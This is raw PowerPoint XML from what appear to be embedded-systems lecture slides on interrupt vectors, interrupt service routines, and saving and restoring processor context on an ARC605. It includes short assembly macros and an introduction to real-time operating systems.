                                <p:cTn id="48" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394139"/>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2394140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394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4120" grpId="0" animBg="1"/>
      <p:bldP spid="2394124" grpId="0" animBg="1"/>
      <p:bldP spid="2394126" grpId="0" animBg="1"/>
      <p:bldP spid="2394127" grpId="0" animBg="1"/>
      <p:bldP spid="2394131" grpId="0" animBg="1"/>
      <p:bldP spid="2394136" grpId="0" animBg="1"/>
      <p:bldP spid="2394137" grpId="0" animBg="1"/>
      <p:bldP spid="2394138" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="2394139" grpId="0" animBg="1"/>
      <p:bldP spid="2394140" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="2394141" grpId="0" animBg="1"/>
      <p:bldP spid="2394134" grpId="0"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smtClean="0"/>
              <a:t>Interrupt Vector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="7848600" cy="3122613"/>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	.seg	“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NTERRUPT_TABLE",text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InterruptTable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	FLAG</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 ; disable all interrupts</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clear all flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	b		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>START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MEM_ERROR_ISR        ; IRQ1</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BAD_INSTRUCTION_ISR  ; IRQ2</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TIMER_ISR            ; IRQ3</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NETWORK_ISR          ; IRQ4</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FLASH_ISR            ; IRQ5</a:t>
            </a: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SERIAL_PORT_ISR      ; IRQ6</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90063237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en-US" smtClean="0"/>
              <a:t>The Interrupt Service Routine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Action of the ISR is very specific to the processor and the peripheral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>At the minimum, the ISR has the following responsibilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Saving the processor context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Acknowledging the interrupt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Restoring the processor context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Returning to the main program (while re-enabling the interrupts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>During the ISR operations, interrupts are disabled, there are no context switches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ISRs should be as short as possible!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31428085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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Saving and restoring the processor context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The ISR will probably use the processor internal registers, but they have content that is still relevant to the main program we just aborted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Therefore, this context must be saved at the entry to the ISR and restored before exiting it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The context is saved on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>main program’s stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> – this stack will also be used by the ISR for calling C functions, local variables, parameters, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Sometimes the programmer defines a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>dedicated stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>for interrupt processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299209693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sz="4000" smtClean="0"/>
              <a:t>Returning from an interrupt – ARC605</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Simply need to jump back to the address stored in the appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>interrupt link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>register (ILINKp where p is the interrupt priority)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>A special opcode (“Jump with flags” – j.f) will tell the processor to copy back STATUS32_Lp to STATUS32 – effectively re-enabling the interrupts at the processor level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304625166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en-US" smtClean="0"/>
              <a:t>ISR - example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="7848600" cy="1474788"/>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TIMER_ISR:</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isr_save_context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		; macro</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TimerInterruptHandler</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C function</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isr_restore_context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		; macro</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j.f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ilink1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30706527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en-US" smtClean="0"/>
              <a:t>Context Save</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="7848600" cy="4495800"/>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.macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isr_save_context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sub	%sp, %sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" noProof="1">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st	%blink, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>128</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%r1,  [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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%r2,  [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8</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st	%r28, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>112</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%LP_COUNT, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>116</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lr	%r0, [%LP_START]</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120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lr	%r0, [%LP_END]</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124</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">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.endm</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2408750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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Context Restore</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2057400"/>
            <a:ext cx="7848600" cy="4221163"/>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.macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isr_restore_context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%r0, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>124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sr	%r0, [%LP_END]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	ld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%r0, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>120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sr	%r0, [%LP_START]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	ld	%LP_COUNT, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>116</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%r28, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>112</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%r2,  [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8</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%r1,  [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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%r0,  [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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%blink, [%sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>128]</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add	%sp, %sp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>132</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.endm</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12716972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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shortcut</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The allows to mark a function as an ISR by using the keyword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>_INTERRUPT1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>_INTERRUPT2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> for level 1/2 ISRs respectively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Such a function will save and restore the context for all registers, and return using the appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>So Assembly code includes Interrupt Vector only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13930601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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real-time Operating Systems (RTOS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="510810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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wide Range of Expertise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Hardware / Firmware interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compilation and build processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Operating systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Optimizations for performance, code size, power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Real-time constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
